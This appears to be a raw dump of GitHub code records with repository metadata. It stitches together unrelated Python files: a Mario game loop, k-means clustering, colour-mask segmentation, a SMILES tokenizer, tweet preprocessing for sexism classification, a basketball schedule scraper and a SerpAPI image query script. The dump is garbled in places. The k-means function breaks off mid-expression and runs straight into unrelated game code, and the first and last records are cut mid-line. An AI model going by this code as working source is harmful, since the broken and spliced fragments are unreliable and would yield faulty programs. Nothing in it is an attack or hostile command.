ModelNand(0, False))\n part_lib.add_part(\"F37\", ModelNand(5, True))\n part_lib.add_part(\"F10\", ModelNand(0, True))\n part_lib.add_part(\"F20\", ModelNand(0, True)) ### Not: OC-thing with ALU-ZERO outputs\n part_lib.add_part(\"F30\", ModelNand(0, True))\n part_lib.add_part(\"F40\", ModelNand(0, True))\n part_lib.add_part(\"F133\", ModelNand(0, True))\n part_lib.add_part(\"AND4\", ModelNand(0, False))\n part_lib.add_part(\"AND3\", ModelNand(0, False))\n part_lib.add_part(\"AND2\", ModelNand(0, False))\n","repo_name":"Datamuseum-DK/R1000.Emulator","sub_path":"NetList/model_nand.py","file_name":"model_nand.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"73492607185","text":"class Point:\n\t\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\t\t\n\tdef __repr__(self):\n\t\treturn f\"Point({self.x}, {self.y})\"\n\t\n\tdef __add__(self, other):\n\t\treturn Point(self.x +other.x, self.y+other.y)\n\tdef __neg__(self):\n\t\treturn Point(-self.x, -self.y)\n\t\t\n\tdef __sub__(self, other):\n\t\tnew = other.__neg__()\n\t\treturn self.__add__(new)\n\t\t\n\tdef __mul__(self, other):\n\t\tif isinstance(other, (int, float)):\n\t\t\treturn Point(self.x *other, self.y *other)\n\t\telse: # dot product\n\t\t\treturn self.x*other.x + self.y*other.y\n\t\t\t\n\tdef distance(self, other):\n\t\tp = self - other\n\t\treturn (p.x**2 +p.y**2)**0.5\n\nclass Cluster(object):\n\t\t\n\t\tdef __init__(self, x, y):\n\t\t\tself.center = Point(x, y)\n\t\t\tself.points = []\n\t\t\n\t\tdef update(self):\n\t\t\t\n\t\t\tx_c = sum([point.x for point in self.points])/len(self.points)\n\t\t\ty_c = sum([point.y for point in self.points])/len(self.points)\n\t\t\t\n\t\t\tself.center = Point(x_c, y_c)\n\t\t\tself.points = []\n\t\t\t\n\t\tdef add_point(self, point):\n\t\t\tself.points.append(point)\n\t\t\t\ndef kmean(pointss):\n\t\t\tpoints = [Point(*point) for point in pointss]\n\t\t\tc1 = Cluster(1,0)\n\t\t\tc2 = Cluster(-1,0)\n\t\t\tc1_old = []\n\t\t\tfor _ in range(10000):\n\t\t\t\tfor point in points:\n\t\t\t\t\tif point.distance(c1.center)= 0):\n self.level.mario.move(dirs[STOP]) # Stops, only if still moving the direction of key released\n elif d == UP:\n self.level.mario.jumping = False\n elif d == DOWN:\n self.level.mario.toggle_duck()\n if e.type == pg.KEYDOWN:\n if e.key in dir_keys:\n d = dir_keys[e.key]\n if d == LEFT or d == RIGHT:\n print(d)\n self.level.mario.move(dirs[d])\n elif d == UP:\n # self.level.mario.jump()\n self.level.mario.jumping = True\n elif d == DOWN:\n self.level.mario.toggle_duck()\n elif e.key == pg.K_RETURN:\n self.level.mario.change_state((self.level.mario.state + 1) % 3)\n # print(self.bg_color)\n\n def play(self):\n while not self.finished:\n self.check_events()\n self.update()\n self.draw()\n self.deltaTime = self.clock.tick(self.settings.fps) # FPS cap\n print(\"GAME OVER! EXITING...\")\n exit()\n","repo_name":"ZachHofmeister/Pygame-Mario","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44520856920","text":"import numpy as np\nimport pandas as pd\n\ndef parse_colors_config(colors_config):\n\n colors = pd.read_csv(colors_config, sep=' ')\n print(colors)\n\n \n Colors_config = {}\n\n for i in range(len(colors['colorname'])):\n Colors_config[colors['colorname'][i]] = [(colors['lowerH'][i], colors['lowerS'][i], colors['lowerV'][i]), (colors['upperH'][i], colors['upperS'][i], colors['upperV'][i])]\n\n return Colors_config\n\ndef detect_segment(mask):\n \n\n mask_xproj = [np.max(i) for i in mask.T]\n \n edges = []\n \n up = max(mask_xproj)\n down = np.min(mask_xproj) - np.max(mask_xproj)\n \n for i in range(1, len(mask_xproj)):\n \n if i == 1 and mask_xproj[i-1] == up:\n start = i\n if mask_xproj[i] - mask_xproj[i-1] == up:\n start = i\n if mask_xproj[i] - mask_xproj[i-1] == down:\n edges.append((start, i))\n Segments = []\n Segments_edges = []\n for edge in edges:\n \n V_segment = mask.T[edge[0]:edge[1]].T\n if len(V_segment[0]) == 0:\n continue\n current_segment = None\n for i in range(len(V_segment)):\n line = V_segment[i]\n \n if i == len(V_segment) - 1 and current_segment != None:\n Segments_edges.append((edge[0]-1, edge[1], left-1, i))\n \n if max(line) == 0:\n \n if current_segment == None:\n continue\n Segments.append(current_segment)\n Segments_edges.append((edge[0]-1, edge[1], left-1, i))\n current_segment = None\n continue\n \n if current_segment == None:\n current_segment = [line]\n left = i\n \n else:\n current_segment.append(line)\n return Segments_edges\n \n\n","repo_name":"DNKonanov/gimnastics_analisys","sub_path":"color_label/colors_processing.py","file_name":"colors_processing.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45103414086","text":"import pytest\nfrom random import randint\n\n\nclass TestLogin:\n\n def test_login1(self):\n print(\"这是测试1\")\n assert 1\n\n @pytest.mark.run(order=1)\n def test_login2(self):\n num = randint(1, 5)\n if num == 1:\n assert 1\n else:\n assert 0\n","repo_name":"lujun2019/test_scrip","sub_path":"pytest_test/scripts/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15129187931","text":"\"\"\"\nDefinitions labels.\n\"\"\"\n\nfrom PyQt6.QtWidgets import QLabel\nfrom PyQt6.QtGui import QFont\n\n\nclass Definition(QLabel):\n \"\"\"Word definition label.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.set_ui()\n\n def set_ui(self):\n \"\"\"Set user interface.\"\"\"\n\n self.setMinimumHeight(100)\n self.setWordWrap(True)\n self.setFont(QFont('Helvetica', 10))\n self.setStyleSheet('background-color: #fefcf9;')\n","repo_name":"rivka-levit/english-dictionary-gui","sub_path":"gui/definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"131601339","text":"# -*- encoding: utf-8 -*-\n'''\nFilename :tokenizer.py\nDescription :分词工具\nTime :2023/07/26 15:14:04\nAuthor :daiyizheng\nEmail :387942239@qq.com\nVersion :1.0\n'''\nfrom __future__ import annotations, print_function\nimport abc\nfrom typing import Dict, Text, Tuple, Union, List\n\nfrom mio import write_json_to_file, read_json\nimport torch\n\nclass Tokenizer(abc.ABC):\n \"\"\"\n Tokenizer class for converting smiles to tokens.\n \"\"\"\n def __init__(self, \n vocab_list,\n bos_token: Text = '',\n eos_token: Text = '',\n pad_token: Text = '',\n unk_token: Text = '',\n **kwargs\n ):\n self.__vocab_list = vocab_list\n self.__bos_token=bos_token\n self.__eos_token=eos_token\n self.__pad_token=pad_token\n self.__unk_token=unk_token\n\n @property\n def vocab_list(self) -> list:\n return self.__vocab_list\n\n @property\n def bos_token_ids(self):\n return self.token_to_id[self.__bos_token]\n \n @property\n def bos_token(self):\n return self.__bos_token\n \n @property\n def eos_token_ids(self):\n return self.token_to_id[self.__eos_token]\n\n @property\n def eos_token(self):\n return self.__eos_token\n\n @property\n def unk_token_ids(self):\n return self.token_to_id[self.__unk_token]\n\n @property\n def unk_token(self):\n return self.__unk_token\n\n @property\n def pad_token_ids(self):\n return self.token_to_id[self.__pad_token]\n\n @property\n def pad_token(self):\n return self.__pad_token\n\n def tokenize(self, smiles: str) -> list:\n \"\"\"\n Tokenize smiles.\n \"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def convert_token_to_ids(self, token:Text):\n \"\"\"\n Covert token to ids.\n \"\"\"\n raise NotImplementedError\n \n @abc.abstractmethod\n def convert_ids_to_token(self, ids:int):\n \"\"\"\n Covert ids to token.\n \"\"\"\n raise NotImplementedError\n \n @abc.abstractmethod\n def save_config(self, path: Text) -> None:\n raise NotImplementedError\n \n @classmethod\n def load_config_from_path(cls, *args, **kwargs):\n raise NotImplementedError\n \n @classmethod\n def load_config(cls, *args, **kwargs):\n raise NotImplementedError\n\n def __call__(self, smiles: str) -> list:\n return self.tokenize(smiles)\n\n def __repr__(self) -> str:\n return f\"{self.__class__.__name__}()\"\n\n\nclass CharTokenizer(Tokenizer):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n all_syms = self.vocab_list + [self.bos_token, self.eos_token, self.pad_token, self.unk_token]\n self.token_to_id = {c: i for i, c in enumerate(all_syms)}\n self.id_to_token = {i: c for i, c in enumerate(all_syms)}\n \n @staticmethod\n def tokenize(smiles: Text\n ) -> List:\n \"\"\"\n Tokenize smiles.\n \n Args:\n smiles: smiles string\n Returns:\n tokenized list\n \"\"\"\n return [c for c in smiles]\n \n @staticmethod\n def from_data(data:Union[List[Text], Tuple],\n bos_token:Text = '', \n eos_token:Text = '',\n pad_token:Text = '',\n unk_token:Text = '',\n **kwargs):\n \"\"\"\n load vocab list from smiles\n Args:\n data: smiles list\n bos_token: token\n eos_token: token\n pad_token: token\n unk_token: token\n **kwargs: other arguments\n Returns: Tongkenizer object\n \"\"\"\n vocab_list = set()\n for string in data:\n vocab_list.update(string)\n vocab_list = sorted(list(vocab_list))\n \n CharTokenizer.check_special_tokens(vocab_list, bos_token, eos_token, pad_token, unk_token)\n config = {\n \"vocab_list\":vocab_list,\n \"bos_token\":bos_token,\n \"eos_token\":eos_token,\n \"pad_token\":pad_token,\n \"unk_token\":unk_token\n }\n return CharTokenizer.load_config(config=config, **kwargs)\n\n def save_config(self, filename: Text) -> None:\n \"\"\"\n Save config to file.\n Args:\n filename: config file path\n \"\"\"\n tokenizer_config = {\n \"name\": self.__class__.__name__,\n \"bos_token\" : self.bos_token,\n \"eos_token\" : self.eos_token,\n \"pad_token\" : self.pad_token,\n \"unk_token\" : self.unk_token,\n \"vocab_list\" : self.vocab_list\n }\n ## save to json file\n write_json_to_file(filename=filename, obj=tokenizer_config)\n\n def convert_token_to_ids(self, token:Text) -> int:\n \"\"\"\n Covert token to ids.\n \n Args:\n token: token\n Returns:\n ids\n \"\"\"\n return self.token_to_id.get(token, self.unk_token_ids)\n\n def convert_ids_to_token(self, ids: int):\n \"\"\"\n Covert ids to token\n \n Args:\n ids: ids\n Returns:\n token\n \"\"\"\n return self.id_to_token.get(ids, self.unk_token)\n \n def string_to_ids(self, \n string:Text, \n is_add_bos_eos_token_ids:bool=True):\n token_ids = [self.convert_token_to_ids(s) for s in string]\n if is_add_bos_eos_token_ids:\n token_ids = [self.bos_token_ids] + token_ids + [self.eos_token_ids]\n return token_ids\n\n def ids_to_string(self, \n ids:int, \n is_del_bos_eos_token:bool=True):\n if isinstance(ids, torch.Tensor):\n ids = ids.tolist()\n if is_del_bos_eos_token:\n ids = ids[1:]\n ids = ids[:-1]\n return \"\".join([self.convert_ids_to_token(i) for i in ids])\n\n @staticmethod\n def check_special_tokens(vocab_list:List, \n bos_token:Text, \n eos_token:Text, \n pad_token:Text,\n unk_token:Text):\n if (bos_token in vocab_list) or (eos_token in vocab_list) or \\\n (pad_token in vocab_list) or (unk_token in vocab_list):\n raise ValueError('SpecialTokens in chars')\n\n @classmethod\n def load_config_from_path(cls, path):\n config = read_json(path)\n return cls.load_config(config=config)\n \n \n @classmethod\n def load_config(cls, config:Dict, **kwargs) -> Tokenizer:\n \n \"\"\"\n Load tokenizer from config file.\n {\n \"name\":xxTokenizer,\n \"bos_token\" : \"\",\n \"eos_token\" : '',\n \"pad_token\" : '',\n \"unk_token\" : '',\n \"vocab_list\" : []\n }\n \"\"\"\n vocab_list = config[\"vocab_list\"]\n bos_token = config[\"bos_token\"] if config[\"bos_token\"] else None\n eos_token = config[\"eos_token\"] if config[\"eos_token\"] else None\n pad_token = config[\"pad_token\"] if config[\"pad_token\"] else None\n unk_token = config[\"unk_token\"] if config[\"unk_token\"] else None\n cls.check_special_tokens(vocab_list, bos_token, eos_token, pad_token, unk_token)\n\n return cls(vocab_list=vocab_list, \n bos_token=bos_token,\n eos_token=eos_token,\n pad_token=pad_token,\n unk_token=unk_token,\n **kwargs)\n \n def __len__(self):\n return len(self.token_to_id)\n\n \n# if __name__ == '__main__':\n# import pandas as pd\n# df = pd.read_csv(\"/DYZ/dyz1/custom_package/drugflow/examples/datasets/train.csv\")\n# smiles = df[\"SMILES\"].to_numpy()\n# tokenize = CharTokenizer.from_data(smiles)\n# tokenize.save_config(\"./test.json\")\n# t = CharTokenizer.load_config_from_path(\"./test.json\")\n# print(t)","repo_name":"daiyizheng/mol_gen","sub_path":"tokenizers/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":8128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40802693189","text":"import bpy\nimport math\n\ndef RGBtoHSV(R,G,B):\n\t# min, max, delta;\n\tmin_rgb = min( R, G, B )\n\tmax_rgb = max( R, G, B )\n\tV = max_rgb\n\n\tdelta = max_rgb - min_rgb\n\tif not delta:\n\t\tH = 0\n\t\tS = 0\n\t\tV = R # RGB are all the same.\n\t\treturn H,S,V\n\n\telif max_rgb: # != 0\n\t\tS = delta / max_rgb\n\telse:\n\t\tR = G = B = 0 # s = 0, v is undefined\n\t\tS = 0\n\t\tH = 0 # -1\n\t\treturn H,S,V\n\n\tif R == max_rgb:\n\t\tH = ( G - B ) / delta # between yellow & magenta\n\telif G == max_rgb:\n\t\tH = 2 + ( B - R ) / delta # between cyan & yellow\n\telse:\n\t\tH = 4 + ( R - G ) / delta # between magenta & cyan\n\n\tH *= 60 # degrees\n\tif H < 0:\n\t\tH += 360\n\n\tH = H * (math.pi / 180.0)\n\t\n\treturn H,S,V\n\ndef colHSVDist(col1, col2):\n\t\"\"\"\n\tCalculates the distance between two colors in the HSV space\n\t:param col1: First HSV color\n\t:type col1: list\n\t:param col2: Second HSV color\n\t:type col2: list\n\t\"\"\"\n\treturn math.pow((math.cos(col1[0]) * col1[1]) - (math.cos(col2[0]) * col2[1]), 2.0) + math.pow((math.sin(col1[0]) * col1[1]) - (math.sin(col2[0]) * col2[1]), 2.0)","repo_name":"TheFamousRat/MasterThesis2021","sub_path":"src/basicUtils.py","file_name":"basicUtils.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41644687400","text":"import sqlite3\nfrom pathlib import Path\n\ndatabase_dir_name = 'database'\ndatabasae_file_name = 'example.db'\n\ndef create_tables(cur):\n # Create table\n try:\n cur.execute('''CREATE TABLE product \n (description text, price text)''')\n except:\n return False\n else:\n return True\n\ndef re_create_tables(cur):\n # Drop and then Create table\n try:\n cur.execute('''DROP TABLE product''')\n cur.execute('''CREATE TABLE product \n (description text, price text)''')\n except:\n return False\n else:\n return True\n\n\ndef init_database():\n Path(f\"{database_dir_name}\").mkdir(parents=True, exist_ok=True)\n con = sqlite3.connect(f\"{database_dir_name}/{databasae_file_name}\")\n cur = con.cursor()\n\n if not create_tables(cur):\n re_create_tables(cur)\n\n con.close()\n","repo_name":"yeeeshiuan/shopee_crawler","sub_path":"db_function.py","file_name":"db_function.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12453345483","text":"# coding: utf-8\n\nfrom flask import Blueprint, request, jsonify\nfrom . import match_service\n\nwords_blueprint = Blueprint('word', __name__)\n\n\n@words_blueprint.route('/', methods=('GET', ))\ndef home():\n return jsonify(\n {\n 'API': [\n '/closest_word',\n '/proximity'\n ]\n }\n )\n\n\n@words_blueprint.route('/closest_word', methods=('GET', ))\ndef closest_word():\n possibilities = request.args.get('possibilities').split(',')\n word = request.args.get('word')\n closest_word = match_service.get_close_matches(word, possibilities)\n return jsonify({\n 'closest_word': closest_word\n })\n\n\n@words_blueprint.route('/proximity', methods=('GET', ))\ndef proximity():\n word_a, word_b = request.args.get('word_a'), request.args.get('word_b')\n proximity = match_service.get_proximity(word_a, word_b)\n return jsonify({\n 'proximity': proximity\n })\n","repo_name":"IuryAlves/flask_getting_started","sub_path":"example_6/words/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36700768686","text":"\nimport emoji\nimport json\nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nimport matplotlib.pyplot as plt\nfrom wordsegment import load, segment\nfrom sklearn.utils import class_weight\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom sklearn.preprocessing import LabelBinarizer, LabelEncoder\n\nimport pickle\nload()\n\ndef check_iflabels_doesnotexist(df, task_type):\n if not get_taskname(task_type) in df.columns:\n df[get_taskname(task_type)] = [\"-1\"]*df.shape[0]\n return df\n\ndef space_special_chars(wrd):\n return ''.join(e if (e.isalnum() or e==\" \") else f\" {e} \" for e in wrd)\n\ndef segment_hashtags(stg):\n if \"#\" in stg:\n words = stg.split()\n words = [\" \".join(segment(wrd)) if '#' in wrd else wrd for wrd in words]\n stg = \" \".join(words)\n return stg\n\n\ndef read_corpus(filename = \"data/train.tsv\", delimiter = \",\", task_type = \"A\"):\n print(filename, delimiter)\n df = pd.read_csv(filename, sep=delimiter)\n\n df['preprocessed_text'] = df['text'].str.replace(r'&', r'and', regex=True)\n\n # Hashtags\n df['preprocessed_text'] = df['preprocessed_text'].apply(segment_hashtags)\n df['preprocessed_text'] = df['preprocessed_text'].str.lower()\n\n df['preprocessed_text'] = df['preprocessed_text'].apply(space_special_chars)\n df['preprocessed_text'] = df['preprocessed_text'].str.replace(r' +', r' ', regex=True)\n\n # remove urls\n df['preprocessed_text'] = df['preprocessed_text'].str.replace(r'[URL]', \"http\", regex=True)\n\n # removal of @USER token\n df['preprocessed_text'] = df['preprocessed_text'].str.replace(r'(@USER\\s*){4,}','@USER @USER @USER ', regex=True)\n\n # replace numbers by [NUM] token\n df[\"preprocessed_text\"] = df[\"preprocessed_text\"].str.replace(r\"([0-9]+[.,]*[0-9]+)\", \"[NUM]\", regex=True)\n \n # Emoji to natural language\n df['preprocessed_text'] = df['preprocessed_text'].apply(emoji.demojize)\n df['preprocessed_text'] = df['preprocessed_text'].str.replace(r':(\\w+):', r'\\g<1>', regex=True)\n df['preprocessed_text'] = df['preprocessed_text'].str.replace(r'_', r' ', regex=True)\n df['preprocessed_text'] = df['preprocessed_text'].str.replace(r':', r' ', regex=True)\n\n df['preprocessed_text'] = df['preprocessed_text'].str.replace(r' +', r' ', regex=True)\n\n # df[[\"preprocessed_text\", \"label\"]].to_csv(filename+'.check')\n reviews = df['preprocessed_text'].values.tolist()\n check_iflabels_doesnotexist(df, task_type)\n labels = df[get_taskname(task_type)].values.tolist()\n ids = df['rewire_id'].values.tolist()\n return ids, reviews, labels\n\n\ndef get_taskname(task_type = \"A\"):\n class_mapdict = {\"A\": \"label_sexist\",\n \"B\": \"label_category\",\n \"C\": \"label_vector\"}\n return class_mapdict[task_type]\n\ndef calculate_confusion_matrix(Y_test, y_pred, labels):\n matrix = confusion_matrix(Y_test, y_pred)\n # Convert to pandas dataframe confusion matrix.\n matrix = (pd.DataFrame(matrix, index=labels, columns=labels))\n return matrix\n\n\ndef plot_confusion_matrix(matrix):\n fig, _ = plt.subplots(figsize=(9, 8))\n sn.heatmap(matrix, annot=True, cmap=plt.cm.Blues, fmt='g')\n # show the picture\n plt.show()\n fig.savefig(\"heatmap.png\")\n return\n\ndef compute_class_weights(encoder, Y_train):\n class_weightscores = class_weight.compute_class_weight(class_weight = 'balanced'\n ,classes = encoder.classes_\n ,y = Y_train)\n return class_weightscores\n\ndef create_class_weights(Y_train, encoder):\n class_weightscores = compute_class_weights(encoder, Y_train)\n classname2id = dict((name, ix) for (ix, name) in enumerate(encoder.classes_))\n class_weights = dict( (k,v) for (k,v) in zip(encoder.classes_, class_weightscores))\n print(f\"Class weights are {class_weights}\")\n class_weights = dict( (classname2id[k],v) for (k,v) in class_weights.items())\n print(f\"Class weights are {class_weights}\")\n return class_weights\n\ndef write_preds(ids, Y_pred, filename):\n \"\"\"Write test predictions along with inputs and expected outputs\n Args:\n X_test (List): Text test sentences\n Y_test (List): Labels of test dataset\n Y_pred (List): Labels predicted\n \"\"\"\n txtt = []\n for idd, yprd in zip(ids, Y_pred):\n txtt.append([yprd, idd])\n\n txtt = pd.DataFrame(txtt, columns=[\"label_pred\",\"rewire_id\"] )\n txtt.to_csv(filename, index=False)\n\ndef get_preds(model, X_test, task_type, encoder):\n '''Do predictions'''\n # Get predictions using the trained model\n try:\n Y_pred = model.predict(X_test).logits # For BERT\n except:\n Y_pred = model.predict(X_test)\n # Finally, convert to numerical labels to get scores with sklearn\n Y_pred = np.argmax(Y_pred, axis=1)\n # If you have gold data, you can calculate accuracy\n\n Y_pred = [encoder.classes_[el] for el in Y_pred]\n return Y_pred\n\ndef test_set_predict(model, X_test, Y_test,\n ident, encoder, showplot,\n task_type):\n Y_pred = get_preds(model, X_test, task_type, encoder)\n\n if task_type == \"A\":\n Y_test = [el[0] for el in list(Y_test)]\n else:\n Y_test = np.argmax(Y_test, axis=1)\n\n Y_test = [encoder.classes_[el] for el in Y_test]\n\n print('Accuracy on own {1} set: {0}'.format(round(accuracy_score(Y_test, Y_pred), 3), ident))\n print('Macro-F1 on own {1} set: {0}'.format(round(f1_score(Y_test, Y_pred, average=\"macro\"), 3), ident))\n if showplot:\n # get the classnames from encoder\n classnames = encoder.classes_\n matrix = calculate_confusion_matrix(Y_test, Y_pred, classnames)\n plot_confusion_matrix(matrix)\n return Y_pred, Y_test\n\ndef save_picklefile(inp_object, filename):\n with open(filename, \"wb\") as fh:\n pickle.dump(inp_object, fh)\n\ndef load_picklefile(filename):\n with open(filename, \"rb\") as fh:\n saved_obj = pickle.load(fh)\n return saved_obj\n\ndef numerize_labels(Y_train, Y_dev, task_type = \"A\"):\n # Transform string labels to one-hot encodings\n encoder = LabelBinarizer()\n Y_train_bin = encoder.fit_transform(Y_train) # Use encoder.classes_ to find mapping back\n Y_dev_bin = encoder.transform(Y_dev)\n return encoder, Y_train_bin, Y_dev_bin\n\ndef numerize_labels_pytorch(Y_train, Y_dev):\n # Transform string labels to one-hot encodings\n encoder = LabelEncoder()\n encoder.fit(Y_train) # Use encoder.classes_ to find mapping back\n Y_train_bin = encoder.transform(Y_train)\n Y_dev_bin = encoder.transform(Y_dev)\n return encoder, Y_train_bin, Y_dev_bin\n\n\ndef filter_none_class(ids, reviews, labels):\n new_list_id = []\n new_list_text = []\n new_list_label = []\n for id, review, lbl in zip(ids, reviews, labels):\n if lbl != \"none\":\n new_list_text.append(review)\n new_list_label.append(lbl)\n new_list_id.append(id)\n return new_list_id, new_list_text, new_list_label\n\ndef read_json_default(filename):\n if filename==\"\": return {}\n data = read_json(filename)\n return data\n\ndef read_json(filename):\n with open(filename, 'r') as fp:\n data = json.load(fp) \n return data\n\ndef extract_features(ids, filename1, filename2, filename3):\n localfeatures = [[]*len(ids)]\n jsondata1 = read_json_default(filename1)\n jsondata2 = read_json_default(filename2)\n jsondata3 = read_json_default(filename3)\n localfeatures = [ jsondata1.get(sntid,[])+jsondata2.get(sntid,[])+jsondata3.get(sntid,[]) for sntid in ids ]\n localfeatures = np.array(localfeatures)\n return localfeatures\n\ndef read_data(train_file, dev_file, task_type):\n # Read in the data\n train_ids, X_train, Y_train = read_corpus(train_file, \",\", task_type)\n dev_ids, X_dev, Y_dev = read_corpus(dev_file, \",\", task_type)\n if task_type != \"A\":\n train_ids, X_train, Y_train = filter_none_class(train_ids, X_train, Y_train)\n dev_ids, X_dev, Y_dev = filter_none_class(dev_ids, X_dev, Y_dev)\n\n return train_ids, X_train, Y_train, dev_ids, X_dev, Y_dev\n\n\nFEATURE_NAMES = { \"empath\":[ \"sexism\", \"violence\", \"money\", \"valuable\" \"domestic work\", \"hate\", \"aggression\", \"anticipation\", \"crime\", \"weakness\",\n \"horror\", \"swearing terms\", \"kill\", \"sexual\", \"cooking\",\n \"exasperation\", \"body\", \"ridicule\", \"disgust\", \"anger\", \"rage\"],\n\n \"papi\": [\"flirtation\", \"identity_attack\", \"insult\", \"obscene\", \"profanity\",\n \"severe_toxicity\", \"sexually_explicit\", \"threat\", \"toxicity\"],\n \n \"hurtlex\": [\"negative stereotypes and ethnic slurs\",\n \"professions and occupations\",\n \"physical disabilities and diversity\",\n \"cognitive disabilities and diversity\",\n \"female genitalia\",\n \"words related to prostitution\",\n \"words related to homosexuality\",\n \"with potential negative connotations\",\n \"derogatory words\",\n \"male genitalia\"]}\n\ndef load_features_file(filename):\n with open(filename, 'r') as fh:\n features_perid = json.load(fh)\n return features_perid\n\ndef add_features_to_sents(ids, sents, split_name,\n filename, feature_name,\n FEATURE_THRESHOLDS = { \"empath\": 0, \"hurtlex\": 0, \"papi\": 0.5}):\n features_perid = load_features_file(filename.replace(\".json\", f\"_{split_name}.json\"))\n featurenames = FEATURE_NAMES[feature_name]\n new_sentences = []\n for id, snt in zip(ids, sents):\n local_features = []\n extra_sent = []\n snt_features = features_perid[id]\n for ind_feat, feat_name in zip(snt_features, featurenames):\n if ind_feat>FEATURE_THRESHOLDS[feature_name]:\n local_features.append(feat_name)\n\n if len(local_features)==0:\n extra_sent = [\"None\"]\n else:\n extra_sent = extra_sent + list(set(local_features))\n new_sentences.append(f\"{snt}. {feature_name} features : {', '.join(extra_sent)}\")\n\n return ids, new_sentences\n\ndef append_feat_totraindev(features_file, train_ids, X_train,\n dev_ids, X_dev, feature_name,\n threshold_values):\n if features_file:\n train_ids, X_train = add_features_to_sents(train_ids, X_train, \"train\",\n features_file, feature_name,\n threshold_values)\n dev_ids, X_dev = add_features_to_sents(dev_ids, X_dev, \"dev\",\n features_file, feature_name,\n threshold_values)\n return train_ids, X_train, dev_ids, X_dev\n","repo_name":"SanneW7/Shared-Task-","sub_path":"models-code/systems/neural/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31080484365","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def getDirections(self, root: Optional[TreeNode], startValue: int, destValue: int) -> str:\n startPath,destPath = \"\",\"\"\n path = []\n def dfs(node):\n nonlocal startPath,destPath\n if node is None:\n return\n \n if node.val == startValue:\n startPath = \"\".join(path)\n if node.val == destValue:\n destPath = \"\".join(path)\n path.append(\"R\")\n dfs(node.right)\n path.pop()\n path.append(\"L\")\n dfs(node.left)\n path.pop()\n \n dfs(root)\n \n i = 0\n while i DataFrame:\n s = requests.Session()\n s.headers.update({\n 'user-agent': 'Mozilla/5.0'\n })\n r = s.post(HASHTAG_SCHEDULE)\n soup = BeautifulSoup(r.text, 'html.parser')\n inputs = soup.find_all('input', {'type': 'submit', 'class': 'btn'})\n\n options = list(map(lambda input: {\n 'value': input['value'],\n 'script_id': input['name']\n }, inputs))[2::]\n\n form = {}\n for input in soup.find_all('input', {'type': 'hidden'}):\n form[input['name']] = input.get('value') if input.get('value') is not None else ''\n\n form['ctl00$ScriptManager1'] = 'ctl00$ContentPlaceHolder1$UpdatePanel1|' + options[week-1]['script_id']\n form[options[week - 1]['script_id']] = options[week-1]['value']\n r = s.post(HASHTAG_SCHEDULE, data=form)\n soup = BeautifulSoup(r.text, 'html.parser')\n\n schedule_table = soup.find('div', {'class': 'table-responsive'}).find('table')\n # get schedule table and turn into df\n df = pd.read_html(schedule_table.prettify())[0]\n # remove header rows from df\n df = df.drop(df[df['Team'] == '# Games Played'].index)\n df = df.drop(df[df['Team'] == 'Team'].index)\n\n df['Team'] = df['Team'].apply(lambda team: NBA_NAME_TO_ABBREVIATION_MAP[team])\n df.set_index('Team', inplace=True)\n\n return df\n","repo_name":"elnathanau1/fantasy-dashboard","sub_path":"resources/requests/hashtagbasketball_schedule.py","file_name":"hashtagbasketball_schedule.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18878509932","text":"import requests\r\nimport json\r\nimport config\r\n\r\n\r\ndef query(search: str, image_count: int):\r\n api_key = config.SERPAPI_KEY\r\n request_string = \"https://serpapi.com/search.json?engine=yandex_images&text={query}&p={page}&api_key={key}\"\r\n\r\n page = 0\r\n count = 0\r\n items: list[dict] = []\r\n\r\n while count < image_count:\r\n response = requests.get(request_string.format(query=search, page=page, key=api_key)).json()\r\n image_results = response[\"images_results\"]\r\n position: int = image_results[-1][\"position\"]\r\n\r\n for image_result in image_results:\r\n image_result[\"page\"] = page\r\n\r\n count = position\r\n items.extend(image_results)\r\n page += 1\r\n print(f\"page {page}; count {count}\")\r\n\r\n with open(\"out/image-query.json\", \"w+\") as file:\r\n result = { \"items\": items }\r\n json.dump(result, file)\r\n\r\n\r\n with open(\"out/image-query-backup.json\", \"w+\") as file:\r\n result = { \"items\": items }\r\n json.dump(result, file)\r\n","repo_name":"gs256/topmaker","sub_path":"image_query.py","file_name":"image_query.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24151647077","text":"# Uses python3\nimport sys\n\n# def binary_search(a, x):\n# left, right = 0, len(a)\n# # write your code here\n\ndef binarySearch (arr, 